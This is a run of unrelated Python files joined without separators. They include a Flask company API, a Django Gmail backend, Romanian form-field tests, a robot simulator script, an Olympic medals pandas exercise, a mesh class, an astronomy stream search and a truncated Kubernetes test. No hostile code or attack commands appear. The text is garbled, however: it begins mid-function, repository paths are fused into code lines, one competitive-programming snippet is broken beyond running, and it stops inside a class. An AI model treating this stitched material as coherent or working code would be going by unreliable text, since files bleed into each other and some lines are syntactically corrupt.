Company.import_json(request.json) if company is None: return send_response(404, 'Bad request', 'Unable to get the JSON data needed') db.session.add(company) db.session.commit() return send_response(200, 'Successful', 'Successful') @api.route('/companies/', methods=['DELETE']) @sudo_required def delete_company(company_id): company = Company.query.get(company_id) if not company: return send_response(404, 'Company not found', '') db.session.delete(company) db.session.commit() log_activity('DELETE[delete_company]', current_user.username, company.name, '') return send_response(200, 'Successful', 'OK') import base64 import json import logging import mimetypes import email.encoders as encoder import socket from email.mime.audio import MIMEAudio from email.mime.base import MIMEBase from email.mime.image import MIMEImage from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from django.conf import settings from google.oauth2 import service_account from googleapiclient.discovery import build from django.core.mail.backends.smtp import EmailBackend logger = logging.getLogger(__name__) class GmailApiBackend(EmailBackend): def __init__( self, fail_silently=False, **kwargs ): super().__init__(fail_silently=fail_silently) self.connection = build('gmail', 'v1', cache_discovery=False, credentials=get_credentials()) def send_messages(self, email_messages): new_conn_created = self.open() if not self.connection or new_conn_created is None: return 0 num_sent = 0 for email_message in email_messages: message = create_message(email_message) sent = self._send(message) if sent: num_sent += 1 if new_conn_created: self.close() return num_sent def _send(self, email_message): try: self.connection.users().messages().send(userId=settings.GMAIL_USER, body=email_message).execute() except Exception as error: logger.error('Error sending email', error) if settings.EMAIL_BACKEND and settings.EMAIL_BACKEND == "mailer.backend.DbBackend": # If using "django-mailer" https://github.com/pinax/django-mailer, tt marks the related message as # deferred only for some exceptions, so we raise one of them to save the error on the db raise socket.error(error) else: raise return True def get_credentials(): credentials = service_account.Credentials.from_service_account_info( json.loads(settings.GOOGLE_SERVICE_ACCOUNT), scopes=settings.GMAIL_SCOPES, subject=settings.GMAIL_USER) return credentials def create_message(email_message): if email_message.attachments: message = MIMEMultipart() msg = MIMEText(email_message.body, email_message.content_subtype) message.attach(msg) else: message = MIMEText(email_message.body, email_message.content_subtype) message['to'] = ','.join(map(str, email_message.to)) message['from'] = email_message.from_email if email_message.reply_to: message['reply-to'] = ','.join(map(str, email_message.reply_to)) if email_message.cc: message['cc'] = ','.join(map(str, email_message.cc)) if email_message.bcc: message['bcc'] = ','.join(map(str, email_message.bcc)) message['subject'] = str(email_message.subject) if email_message.attachments: for attachment in email_message.attachments: content_type, encoding = mimetypes.guess_type(attachment[0]) if content_type is None or encoding is not None: content_type = 'application/octet-stream' main_type, sub_type = content_type.split('/', 1) if main_type == 'text': fp = open(attachment[1], 'rb') msg = MIMEText(fp.read(), _subtype=sub_type) fp.close() elif main_type == 'image': fp = open(attachment[1], 'rb') msg = MIMEImage(fp.read(), _subtype=sub_type) fp.close() elif main_type == 'audio': fp = open(attachment[1], 'rb') msg = MIMEAudio(fp.read(), _subtype=sub_type) fp.close() elif type(attachment[1]) is bytes: msg = MIMEBase(main_type, sub_type) msg.set_payload(attachment[1]) else: fp = open(attachment[1], 'rb') msg = MIMEBase(main_type, sub_type) msg.set_payload(fp.read()) fp.close() filename = attachment[0] msg.add_header('Content-Disposition', 'attachment', filename=filename) encoder.encode_base64(msg) message.attach(msg) b64_bytes = base64.urlsafe_b64encode(message.as_bytes()) b64_string = b64_bytes.decode() return {'raw': b64_string} # -*- coding: utf-8 -*- # Tests for the contrib/localflavor/ RO form fields. tests = r""" >>> from django.contrib.localflavor.ro.forms import * ##ROCIFField ################################################################ f = ROCIFField() f.clean('21694681') u'21694681' f.clean('RO21694681') u'21694681' f.clean('21694680') Traceback (most recent call last): ... ValidationError: [u'Enter a valid CIF'] f.clean('21694680000') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at most 10 characters (it has 11).'] f.clean('0') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at least 2 characters (it has 1).'] f.clean(None) Traceback (most recent call last): ... ValidationError: [u'This field is required.'] f.clean('') Traceback (most recent call last): ... ValidationError: [u'This field is required.'] ##ROCNPField ################################################################# f = ROCNPField() f.clean('1981211204489') u'1981211204489' f.clean('1981211204487') Traceback (most recent call last): ... ValidationError: [u'Enter a valid CNP'] f.clean('1981232204489') Traceback (most recent call last): ... ValidationError: [u'Enter a valid CNP'] f.clean('9981211204489') Traceback (most recent call last): ... ValidationError: [u'Enter a valid CNP'] f.clean('9981211209') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at least 13 characters (it has 10).'] f.clean('19812112044891') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at most 13 characters (it has 14).'] f.clean('') Traceback (most recent call last): ... ValidationError: [u'This field is required.'] ##ROCountyField ############################################################## f = ROCountyField() f.clean('CJ') 'CJ' f.clean('cj') 'CJ' f.clean('Argeş') 'AG' f.clean('argeş') 'AG' f.clean('Arges') Traceback (most recent call last): ... ValidationError: [u'Enter a Romanian county code or name.'] f.clean('') Traceback (most recent call last): ... ValidationError: [u'This field is required.'] ##ROCountySelect ############################################################# f = ROCountySelect() f.render('county','CJ') u'' ##ROIBANField ################################################################# f = ROIBANField() f.clean('RO56RZBR0000060003291177') u'RO56RZBR0000060003291177' f.clean('RO56RZBR0000060003291176') Traceback (most recent call last): ... ValidationError: [u'Enter a valid IBAN in ROXX-XXXX-XXXX-XXXX-XXXX-XXXX format'] f.clean('RO56-RZBR-0000-0600-0329-1177') u'RO56RZBR0000060003291177' f.clean('AT61 1904 3002 3457 3201') Traceback (most recent call last): ... ValidationError: [u'Enter a valid IBAN in ROXX-XXXX-XXXX-XXXX-XXXX-XXXX format'] f.clean('RO56RZBR000006000329117') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at least 24 characters (it has 23).'] f.clean('') Traceback (most recent call last): ... ValidationError: [u'This field is required.'] ##ROPhoneNumberField ########################################################## f = ROPhoneNumberField() f.clean('0264485936') u'0264485936' f.clean('(0264)-485936') u'0264485936' f.clean('02644859368') Traceback (most recent call last): ... ValidationError: [u'Phone numbers must be in XXXX-XXXXXX format.'] f.clean('026448593') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at least 10 characters (it has 9).'] f.clean(None) Traceback (most recent call last): ... ValidationError: [u'This field is required.'] ##ROPostalCodeField ########################################################### f = ROPostalCodeField() f.clean('400473') u'400473' f.clean('40047') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at least 6 characters (it has 5).'] f.clean('4004731') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at most 6 characters (it has 7).'] f.clean('') Traceback (most recent call last): ... ValidationError: [u'This field is required.'] """ 10-100 #!/usr/bin/env python from SceneObjectExtractor import SceneObjectExtractor import time import vrep # Update rate in seconds #rate = 0.1 extractor = SceneObjectExtractor('127.0.0.1', 19997) # List of object names to retrieve information # For now it is hardcoded extractor.set_static_obj_names(['fake_obj', 'stairs', 'slidingDoor', 'DockStationBody', 'DockStationBody#0',\ 'ConveyorBeltBody', 'ConveyorBeltBody#0', 'ConveyorBeltBody#1', 'ShelfBody', 'ShelfBody#0', 'ShelfBody#1']) extractor.set_dynamic_obj_names(['Bill#3', 'product', 'fake_obj']) extractor.set_robot_names(['turtlebot2i', 'turtlebot2i#0']) print('Connected to remote API server') print('Getting scene properties (this can take a while)...') # Get all objects info once (for static properties) and # prepare the callback for the streaming mode extractor.operation_mode = vrep.simx_opmode_streaming extractor.get_all_objects_info() extractor.update_robots_vision_sensor_info() extractor.update_all_robots_vision_sensors_fov() time.sleep(0.3) # streaming takes a while to get ready extractor.operation_mode = vrep.simx_opmode_buffer extractor.get_all_objects_info() extractor.update_robots_vision_sensor_info() extractor.update_all_robots_vision_sensors_fov() print('Finished getting scene properties!\n') print('Started getting scene objects from vision sensor FOV...') while True: # Get dynamic object info (pose and vel) periodically extractor.update_dynamic_obj_info() # Update vision sensor info extractor.update_all_robots_vision_sensors_fov() # Get objects that are in the sensor FOV for robot in extractor.robot_obj_list: obj_list = extractor.get_objects_from_vision_sensor(robot.vision_sensor) if (obj_list != None): # Remove the robot itself from the list obj_list = [i for i in obj_list if i.name!=robot.name] # Print detected objects of the vision sensor print(robot.name, robot.vision_sensor.name, obj_list) #time.sleep(rate) # Close the connection to V-REP vrep.simxFinish(clientID) from .grid import * # Returns true if snake should be passive. def passive_heuristic(board, health, head, food, board_dim, length, id, num_snakes, snakes): if num_snakes <= 2: for snake in snakes: if snake['id'] != id: return len(snake['body']) + 2 < length and health - board.manhattan_distance(head[0], head[1], food[0], food[1]) > 2*board_dim return False #return health - board.manhattan_distance(head[0], head[1], food[0], food[1]) > 8*board_dim + 1 and length > 4 return health - board.manhattan_distance(head[0], head[1], food[0], food[1]) > 6*board_dim + 1 and length > 4from datetime import datetime from sqlalchemy import Table, Column, Integer, String, ForeignKey, CHAR, Interval from sqlalchemy.dialects.postgresql import TIMESTAMP, JSONB import sqlalchemy as sa METADATA = sa.MetaData() """ CREATE TABLE videos ( id int PRIMARY KEY, title string(40) NOT NULL, owner_id string(5) NOT NULL, date_created date, tags string(30), len interval hour to minute );""" videos = Table( 'videos', METADATA, Column('id', Integer, primary_key=True), Column('title', String(40), nullable=False), Column('owner_id', String(5), nullable=False), Column('date_created', TIMESTAMP), Column('len', Interval), ) def get_video(id, *, session): query = videos.select().where(videos.c.id == id) results = session.execute(query).fetchone() return { 'id': results.id, 'title': results.title, 'owner': results.owner_id, 'date_created': results.date_created, 'length': results.len } def modify_video(id, title, owner_id, *, session): query = videos.update().where(videos.c.id == id) if title: query = query.values(title=title) if owner_id: query = query.values(owner_id=owner_id) session.execute(query) session.commit() def add_video(title, owner_id, length, *, session): query = videos.insert().values( title=title, owner_id=owner_id, len=length, date_created=datetime.now() ) r = session.execute(query) i = r.inserted_primary_key[0] session.commit() print(i) return i """ uncomment below for v 22 """ """ videos = Table( 'videos', METADATA, Column('id', Integer, primary_key=True), Column('title', String(40), nullable=False), Column('title_v2', String(60)), Column('owner_id', String(5), nullable=False), Column('date_created', TIMESTAMP), Column('len', Interval), ) def get_video(id, *, session): query = videos.select().where(videos.c.id == id) results = session.execute(query).fetchone() return { 'id': results.id, 'title': results.title_v2 or results.title, 'owner': results.owner_id, 'date_created': results.date_created, 'length': results.len } def modify_video(id, title, owner_id, *, session): query = videos.update().where(videos.c.id == id) if title: query = query.values(title_v2=title) if owner_id: query = query.values(owner_id=owner_id) session.execute(query) session.commit() def add_video(title, owner_id, length, *, session): query = videos.insert().values( title_v2=title, owner_id=owner_id, len=length, date_created=datetime.now() ) r = session.execute(query) i = r.inserted_primary_key[0] session.commit() return i """ code.py # -------------- #Importing header files import pandas as pd import numpy as np import matplotlib.pyplot as plt #Path of the file path #Code starts here data = pd.read_csv(path) data.rename(columns={'Total':'Total_Medals'}, inplace=True) print(data.head()) # -------------- #Code starts here data['Better_Event'] = np.where(data['Total_Summer'] > data['Total_Winter'], 'Summer', 'Winter') data['Better_Event'] = np.where(data['Total_Summer'] == data['Total_Winter'], 'Both', data['Better_Event']) better_event = data['Better_Event'].value_counts().index.values[0] #print(data.head(5)) print(better_event) assert data['Better_Event'].value_counts()['Summer'] == 143, "Should be 143" # -------------- #Code starts here top_countries = data[['Country_Name','Total_Summer', 'Total_Winter', 'Total_Medals']] print(top_countries.head(5)) top_countries=top_countries[:-1] def top_ten(data,column): country_list = [] country_list=list((data.nlargest(10,column)['Country_Name'])) return country_list top_10_summer=top_ten(top_countries,'Total_Summer') print("Top 10 Summer:\n",top_10_summer, "\n") top_10_winter=top_ten(top_countries,'Total_Winter') print("Top 10 Winter:\n",top_10_winter, "\n") top_10=top_ten(top_countries,'Total_Medals') print("Top 10 :\n",top_10, "\n") common=list(set(top_10_summer) & set(top_10_winter) & set(top_10)) print(common) # -------------- #Code starts here #Create dataframe anmd plot for Summer Event summer_df = data[data['Country_Name'].isin(top_10_summer)] #print(summer_df) plt.figure(figsize=(20,6)) plt.bar(summer_df['Country_Name'], summer_df['Total_Summer']) plt.title('Top 10 Summer') plt.xlabel('Country Name') plt.ylabel('Total Medals') #Create the dataframe and plot for Winter Event winter_df = data[data['Country_Name'].isin(top_10_winter)] #print(winter_df) plt.figure(figsize=(20,6)) plt.bar(winter_df['Country_Name'], winter_df['Total_Winter']) plt.title('Top 10 Winter') plt.xlabel('Country Name') plt.ylabel('Total Medals') #Create the dataframe and plot for Winter Event top_df = data[data['Country_Name'].isin(top_10)] #print(top_df) plt.figure(figsize=(20,6)) plt.bar(top_df['Country_Name'], top_df['Total_Medals']) plt.title('Top 10') plt.xlabel('Country Name') plt.ylabel('Total Medals') # -------------- summer_df['Golden_Ratio'] = summer_df['Gold_Summer'] / summer_df['Total_Summer'] summer_max_ratio = max(summer_df['Golden_Ratio']) print(summer_df['Golden_Ratio'].idxmax()) summer_country_gold = summer_df.loc[summer_df['Golden_Ratio'].idxmax(),'Country_Name'] print("Top Summer Coutnry: ", summer_country_gold, " with a ratio of %.2f" % summer_max_ratio) # For Winter List winter_df['Golden_Ratio'] = winter_df['Gold_Winter'] / winter_df['Total_Winter'] winter_max_ratio = max(winter_df['Golden_Ratio']) winter_country_gold = winter_df.loc[winter_df['Golden_Ratio'].idxmax(), 'Country_Name'] print("Top Winter Country: ", winter_country_gold, " with a ratio of %.2f" % winter_max_ratio) # For Over List top_df['Golden_Ratio'] = top_df['Gold_Total'] / top_df['Total_Medals'] top_max_ratio = max(top_df['Golden_Ratio']) top_country_gold = top_df.loc[top_df['Golden_Ratio'].idxmax(), 'Country_Name'] print("Top Country: ", top_country_gold, " with a ratio of %.2f" % top_max_ratio) # -------------- #Code starts here data_1 = data[:-1] data_1['Total_Points'] = data_1['Gold_Total'] * 3 + data_1['Silver_Total'] * 2 + data_1['Bronze_Total'] * 1 print(data_1.head(10)) most_points = max(data_1['Total_Points']) best_country = data_1.loc[data_1['Total_Points'].idxmax(),'Country_Name'] print("The maximum points achieved is: ", most_points, " by ", best_country) # -------------- #Code starts here #Subsetting the dataframe best=data[data['Country_Name']==best_country] best.reset_index(drop = True, inplace = True) best=best[['Gold_Total','Silver_Total','Bronze_Total']] #Plotting bar plot best.plot.bar(stacked=True) #Changing the x-axis label plt.xlabel('United States') #Changing the y-axis label plt.ylabel('Medals Tally') #Rotating the ticks of X-axis plt.xticks(rotation=45) #Updating the graph legend l=plt.legend() l.get_texts()[0].set_text('Gold_Total :' + str(best['Gold_Total'].values)) l.get_texts()[1].set_text('Silver_Total :' + str(best['Silver_Total'].values)) l.get_texts()[2].set_text('Bronze_Total :' + str(best['Bronze_Total'].values)) #Code ends here crewxart/coj-problems-python0 i=0 u=20 while i<20: phrase= raw_input() phrase=phrase.split() word_1=phrase[0] word_2=phrase[1] tam_1=len(word_1) tam_2=len(word_2) def verificar(tam1, tam2, word_1, word_2): i=0 u=0 result=[] while i=tam2: i=tam1 return result def convert(result): i=0 tam=len(result) string="" while imaxsanttos/Exercicos-Python """ somar todos os numeros compreedido entre 1 e 10 """ soma = 0 for i in range(11): #EM c, seria como : for(i = 1; i<= 11;i++) soma += i print(f"Resultado {soma}") """ TODO: add docstring ------------------------------------------------------------------------------ COPYRIGHT/LICENSE. This file is part of the XYZ package. It is subject to the license terms in the LICENSE file found in the top-level directory of this distribution. No part of the XYZ package, including this file, may be copied, modified, propagated, or distributed except according to the terms contained in the LICENSE file. ------------------------------------------------------------------------------ """ # pylint: disable=invalid-name # --- Imports # Standard library # External packages import numpy # XYZ # TODO from samr.geometry import Geometry # --- Constants # numpy integer data types _NUMPY_INT_DTYPES = [numpy.int_, numpy.intc, numpy.intp, numpy.int8, numpy.int16, numpy.int32, numpy.int64] # --- Class definition class MeshBlock: """ TODO """ # --- Properties @property def num_dimensions(self): """ int: dimensionality of index space """ return self._geometry.num_dimensions @property def lower(self): """ numpy.ndarray: lower corner of index space covered by MeshBlock Notes ----- * lower.dtype = 'int64' """ return self._lower @property def upper(self): """ numpy.ndarray: upper corner of index space covered by MeshBlock Notes ----- * upper.dtype = 'int64' """ return self._upper @property def geometry(self): """ BlockGeometry: geometry of MeshBlock """ return self._geometry @property def data(self): """ dict: mapping from MeshVariables to numpy arrays containing data values """ return self._data # --- Public methods def __init__(self, geometry, lower, upper): """ TODO Parameters ---------- geometry: BlockGeometry geometry of MeshBlock lower: numpy.ndarray of integers lower corner of index space covered by MeshBlock upper: numpy.ndarray of integers upper corner of index space covered by MeshBlock Examples -------- TODO """ # --- Check arguments # geometry if not isinstance(geometry, Geometry): raise ValueError("'geometry' is not Geometry object") # get dimensionality of geometry num_dimensions = geometry.num_dimensions # lower if not isinstance(lower, numpy.ndarray): raise ValueError("'lower' is not a numpy.ndarray") if len(lower) != num_dimensions: err_msg = "'lower' does not have 'num_dimensions' components" raise ValueError(err_msg) if lower.dtype not in _NUMPY_INT_DTYPES: err_msg = "'lower' does not have an integer dtype" raise ValueError(err_msg) # upper if not isinstance(upper, numpy.ndarray): raise ValueError("'upper' is not a numpy.ndarray") if len(upper) != num_dimensions: err_msg = "'upper' does not have 'num_dimensions' components" raise ValueError(err_msg) if upper.dtype not in _NUMPY_INT_DTYPES: err_msg = "'upper' does not have an integer dtype" raise ValueError(err_msg) # --- Set property and attribute values # PYLINT: eliminate 'defined outside __init__' error self._data = {} # index space self._lower = lower.astype('int64') self._upper = upper.astype('int64') # geometry self._geometry = geometry def add_variable(self, mesh_variable): """ TODO """ # Construct data array for variable data = numpy.array(1) # Set data for variable self._data[mesh_variable] = data def get_data(self, mesh_variable): """ TODO """ # --- Check arguments if mesh_variable not in self.data: err_msg = "'mesh_variable' (={}) not defined on MeshBlock". \ format(mesh_variable) raise ValueError(err_msg) # --- Return data return self.data[mesh_variable] illumidesk/teams/roles.py ROLE_ADMIN = 'admin' ROLE_MEMBER = 'member' ROLE_CHOICES = ( # customize roles here (ROLE_ADMIN, 'Administrator'), (ROLE_MEMBER, 'Member'), ) def user_can_access_team(user, team): return user.is_superuser or is_member(user, team) def user_can_administer_team(user, team): return user.is_superuser or is_admin(user, team) def is_member(user, team): return team.members.filter(id=user.id).exists() def is_admin(user, team): from .models import Membership return Membership.objects.filter(team=team, user=user, role=ROLE_ADMIN).exists() recipes/Python/578845_grep_in_Python/recipe-578845.py def grep(*matches): """Returns a generator function that operates on an iterable: filters items in the iterable that match any of the patterns. match: a callable returning a True value if it matches the item >>> import re >>> input = ["alpha\n", "beta\n", "gamma\n", "delta\n"] >>> list(grep(re.compile('b').match)(input)) ['beta\n'] """ def _do_grep_wrapper(*matches): def _do_grep(lines): for line in lines: for match in matches: if match(line): yield line break return _do_grep return _do_grep_wrapper(*matches) """AyudaEnPython: https://www.facebook.com/groups/ayudapython NOTE: La persona que pidio ayuda no dió mas detalles. TODO: add docstring and tests later... """ from abc import ABC, abstractmethod from dataclasses import dataclass, field from random import choices from string import digits from typing import Callable, Dict def generar_imei() -> str: tac = "".join(choices(digits, k=6)) fac = "".join(choices(digits, k=2)) serial = "".join(choices(digits, k=6)) spare = "".join(choices(digits, k=1)) return f"{tac}{fac}{serial}{spare}" @dataclass class Procesador: soc: str cores: int frecuencia: float def overclock(self) -> None: self.frecuencia *= 2 @dataclass class Camara: megapixeles: int def capturar_imagen(self) -> None: print("Imagen capturada") def capturar_video(self) -> None: print("Video capturado") @dataclass class Smartphone(ABC): almacenamiento: str memoria: str procesador: Procesador camara: Camara sistema: str = field(init=False) imei: str = field(default_factory=generar_imei) @abstractmethod def telefono(self): return NotImplementedError() class AndroidPhone(Smartphone): def __init__(self, *args, **kwargs) -> None: super().__init__(*args, **kwargs) self.sistema = "Android" def telefono(self, accion) -> Callable: acciones: Dict[str, Callable] = { "colgar": self.colgar, "marcar": self.marcar, "contestar": self.contestar, } return acciones[accion]() def contestar(self) -> None: print("Atendiento llamada entrante...") def colgar(self) -> None: print("Llamada entrante colgada!") def marcar(self) -> None: print(f"Marcando numero...") def tomar_foto(self) -> None: self.camara.capturar_imagen() def grabar_video(self) -> None: self.camara.capturar_video() if __name__ == "__main__": movil = AndroidPhone( "128GB", "8GB", Procesador("Snapdragon 888", 8, 2.84), Camara(16), ) print(movil) print(movil.almacenamiento) movil.telefono("marcar") movil.tomar_foto() kcotar/Aquarius_membershipgalaxia_simmulation_analysis_streams.py0 import imp, os import astropy.units as un import astropy.coordinates as coord import matplotlib.pyplot as plt import numpy as np import ebf from astropy.table import Table, vstack, Column from mpl_toolkits.mplot3d import Axes3D from sklearn.cluster import DBSCAN from sklearn.neighbors import KernelDensity from sklearn.model_selection import GridSearchCV from skimage.feature import peak_local_max from scipy.ndimage import watershed_ift from skimage.morphology import watershed from vector_plane_calculations import * from velocity_transformations import * imp.load_source('helper', '../tSNE_test/helper_functions.py') from helper import move_to_dir # GALAH # simulation_dir = '/home/klemen/GALAH_data/Galaxia_simulation/GALAH/' # simulation_ebf = 'galaxy_galah_complete.ebf' # simulation_ebf = 'galaxy_galah_fields.ebf' # RAVE simulation_dir = '/home/klemen/GALAH_data/Galaxia_simulation/RAVE/' # simulation_ebf = 'galaxy_rave_complete.ebf' simulation_ebf = 'galaxy_rave_fields.ebf' # out fits simulation_fits = simulation_ebf.split('.')[0]+'.fits' output_dir = '' # -------------------------------------------------------- # ---------------- FUNCTIONS ----------------------------- # -------------------------------------------------------- # -------------------------------------------------------- # ---------------- CONSTANTS AND SETTINGS ---------------- # -------------------------------------------------------- xyz_vel_neighbourhood = 10 # radius km/s # -------------------------------------------------------- # ---------------- INPUT DATA HANDLING ------------------- # -------------------------------------------------------- if os.path.isfile(simulation_dir+simulation_fits): # read data from reduced fits file print 'Reading fits file' stars_data = Table.read(simulation_dir+simulation_fits) else: # read original ebf file and reduce data get_cols = ['px', 'py', 'pz', # Position (x,y,z) heliocentric in kpc (galactic coordinate system) 'vx', 'vy', 'vz', # Velocity (U,V,W) heliocentric in km/s ??????? (galactic coordinate system) 'glon', 'glat']#, # galacitic longitude and latitude in degrees #'feh', 'teff', 'grav'] # metallicity, effective temperature, surface gravity print 'Reading ebf file' sim_data = ebf.read(simulation_dir+simulation_ebf) print 'Creating fits file' stars_data = Table() for col in get_cols: stars_data[col] = sim_data[col] sim_data = None stars_data.write(simulation_dir+simulation_fits) #ra_coord = coord.Galactic(l=stars_data['glon']*un.deg, b=stars_data['glat']*un.deg).transform_to(coord.ICRS) plt.scatter(stars_data['glon'], stars_data['glat'], s=1, color='black') # plt.scatter(ra_coord.ra.value, ra_coord.dec.value, s=1, color='black') plt.show() plt.close() raise SystemExit # -------------------------------------------------------- # ---------------- Stream search parameters -------------- # -------------------------------------------------------- # stream search criteria rv_step = 10. # km/s, rv in the radiant of the stream ra_step = 20. # deg dec_step = 10. # deg # -------------------------------------------------------- # ---------------- Evaluation of possible streams -------- # -------------------------------------------------------- manual_stream_radiants = [[20,45,140,240,370,125,20,150], [-10,-30,20,10,50,35,-80,-60], [20,15,35,70,45,55,22,10], [None]] # list of ra, dec, rv values manual_stream_radiants = [[90], [0], [45], [None]] # list of ra, dec, rv values # manual_stream_radiants = parse_selected_streams('Streams_investigation_lower-thr_selected') # iterate trough all possible combinations for the initial conditions of the stream (rv, ra, dec) if manual_stream_radiants is not None: ra_combinations = manual_stream_radiants[0] dec_combinations = manual_stream_radiants[1] rv_combinations = manual_stream_radiants[2] else: rv_range = np.arange(30, 31, rv_step) ra_range = np.arange(0, 360, ra_step) dec_range = np.arange(-90, 90, dec_step) # create a grid of all possible combination stream_mesh = np.meshgrid(ra_range, dec_range, rv_range) ra_combinations = stream_mesh[0].flatten() dec_combinations = stream_mesh[1].flatten() rv_combinations = stream_mesh[2].flatten() n_combinations = len(ra_combinations) print 'Total number of stream combinations that will be evaluated: '+str(n_combinations) # # transform galactic uvw coordinates to equatorial xyz coordinates # coords_new = coord.SkyCoord(u=stars_data['px'], v=stars_data['py'], w=stars_data['pz'], unit='kpc', # frame='galactic', representation='cartesian').transform_to(coord.ICRS).cartesian # veloci_new = coord.SkyCoord(u=stars_data['vx'], v=stars_data['vy'], w=stars_data['vz'], unit='km', # frame='galactic', representation='cartesian').transform_to(coord.ICRS).cartesian # # stars_data['px'] = coords_new.x.value # stars_data['py'] = coords_new.y.value # stars_data['pz'] = coords_new.z.value # stars_data['vx'] = veloci_new.x.value # stars_data['vy'] = veloci_new.y.value # stars_data['vz'] = veloci_new.z.value move_to_dir('Streams_investigation_'+simulation_ebf.split('.')[0]) for i_stream in range(n_combinations): ra_stream = ra_combinations[i_stream] dec_stream = dec_combinations[i_stream] rv_stream = rv_combinations[i_stream] suffix = 'stream_ra_{:05.1f}_dec_{:04.1f}_rv_{:05.1f}'.format(ra_stream, dec_stream, rv_stream) print 'Working on ' + suffix # convert radiant coordinate from ra/dec/rv to l/b/rv system as Galaxia coordinates are in Galactic system l_b_stream = coord.ICRS(ra=ra_stream*un.deg, dec=dec_stream*un.deg).transform_to(coord.Galactic) l_stream = l_b_stream.l.value b_stream = l_b_stream.b.value # velocity vector of stream in xyz equatorial coordinate system with Earth in the center of it # xyz_vel_stream = compute_xyz_vel(np.deg2rad(ra_stream), np.deg2rad(dec_stream), rv_stream) xyz_vel_stream = compute_xyz_vel(np.deg2rad(l_stream), np.deg2rad(b_stream), rv_stream) # select objects from simulation with similar velocity components vel_diff = np.sqrt((stars_data['vx'] - xyz_vel_stream[0])**2 + (stars_data['vy'] - xyz_vel_stream[1])**2 + (stars_data['vz'] - xyz_vel_stream[2])**2) idx_close = vel_diff < xyz_vel_neighbourhood print 'Selected objects: '+str(np.sum(idx_close)) stars_data_subset = stars_data[idx_close] xyz_pos_stars = np.vstack((stars_data_subset['px'], stars_data_subset['py'], stars_data_subset['pz'])).T * 1000. # conversion from kpc to pc xyz_vel_stars = np.vstack((stars_data_subset['vx'], stars_data_subset['vy'], stars_data_subset['vz'])).T # plot selection print ' Outputting xyz velocities scatter plot' plot_range = 10 labels = ['X', 'Y', 'Z'] plot_comb = [[0, 1], [2, 1], [0, 2]] plot_pos = [[0, 0], [0, 1], [1, 0]] fig, ax = plt.subplots(2, 2) for i_c in range(len(plot_comb)): fig_pos = (plot_pos[i_c][0], plot_pos[i_c][1]) i_x = plot_comb[i_c][0] i_y = plot_comb[i_c][1] alpha_use = 0.1 ax[fig_pos].scatter(xyz_vel_stream[i_x], xyz_vel_stream[i_y], lw=0, c='black', s=10, marker='*') ax[fig_pos].scatter(xyz_vel_stars[:, i_x], xyz_vel_stars[:, i_y], lw=0, c='blue', s=2, alpha=alpha_use) ax[fig_pos].set(xlabel=labels[i_x], ylabel=labels[i_y], xlim=[xyz_vel_stream[i_x] - plot_range, xyz_vel_stream[i_x] + plot_range], ylim=[xyz_vel_stream[i_y] - plot_range, xyz_vel_stream[i_y] + plot_range]) plt.savefig(suffix+'_1.png', dpi=300) plt.close() # compute intersection between star vectors and plane defined by the stream vector print ' Computing intersections' plane_intersects_3D = stream_plane_vector_intersect(xyz_pos_stars, xyz_vel_stars, xyz_vel_stream) plane_intersects_2D = intersects_to_2dplane(plane_intersects_3D, xyz_vel_stream) print ' Outputting plane intersections plot' plot_lim = (-1000, 1000) # Create a plot fig, ax = plt.subplots(1, 1) ax.scatter(plane_intersects_2D[:, 0], plane_intersects_2D[:, 1], lw=0, c='blue', s=2, alpha=1.) ax.scatter(0, 0, lw=0, c='black', s=10, marker='*') # solar position ax.set(xlabel='X stream plane', ylabel='Y stream plane', xlim=plot_lim, ylim=plot_lim) fig.tight_layout() plt.savefig(suffix + '_2.png', dpi=300) plt.close() stars_density = KernelDensity(bandwidth=30, kernel='epanechnikov').fit(plane_intersects_2D) grid_pos = np.linspace(-1000, 1000, 2000) _x, _y = np.meshgrid(grid_pos, grid_pos) print 'Computing density field' density_field = stars_density.score_samples(np.vstack((_x.ravel(), _y.ravel())).T) + np.log(plane_intersects_2D.shape[0]) density_field = np.exp(density_field).reshape(_x.shape) * 1e3 fig, ax = plt.subplots(1, 1) im_ax = ax.imshow(density_field, interpolation=None, cmap='seismic', origin='lower', vmin=0.) # , vmax=4.) fig.colorbar(im_ax) ax.set_axis_off() fig.tight_layout() # plt.savefig(suffix + '_3.png', dpi=250) plt.show() plt.close() heights, edges = np.histogram(density_field, bins=100, range=(1e-5, np.percentile(density_field,98))) width = np.abs(edges[0] - edges[1]) plt.bar(edges[:-1], heights, width=width, color='green', alpha=0.5) plt.show() plt.close() #!/usr/bin/env python # Copyright 2016 The Kubernetes Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import datetime import unittest # TODO(fejta): use non-relative imports # https://google.github.io/styleguide/pyguide.html?showone=Packages#Packages import gcs_async_test from github import models import main_test import view_pr from webapp2_extras import securecookie app = main_test.app write = gcs_async_test.write class PathTest(unittest.TestCase): def test_org_repo(self): def check(path, org, repo): actual_org, actual_repo = view_pr.org_repo(path, 'kubernetes', 'kubernetes') self.assertEquals(actual_org, org) self.assertEquals(actual_repo, repo) check('', 'kubernetes', 'kubernetes') check('/test-infra', 'kubernetes', 'test-infra') check('/kubernetes', 'kubernetes', 'kubernetes') check('/kubernetes/test-infra', 'kubernetes', 'test-infra') check('/kubernetes/kubernetes', 'kubernetes', 'kubernetes') check('/google/cadvisor', 'google', 'cadvisor') def test_pr_path(self): def check(org, repo, pr, path): actual_path = view_pr.pr_path(org, repo, pr, 'kubernetes', 'kubernetes', 'pull_prefix') self.assertEquals(actual_path, '%s/%s' % ('pull_prefix', path)) check('kubernetes', 'kubernetes', 1234, 1234) check('kubernetes', 'kubernetes', 'batch', 'batch') check('kubernetes', 'test-infra', 555, 'test-infra/555') check('kubernetes', 'test-infra', 'batch', 'test-infra/batch') check('google', 'cadvisor', '555', 'google_cadvisor/555') check('google', 'cadvisor', 'batch', 'google_cadvisor/batch') class PRTest(main_test.TestBase): 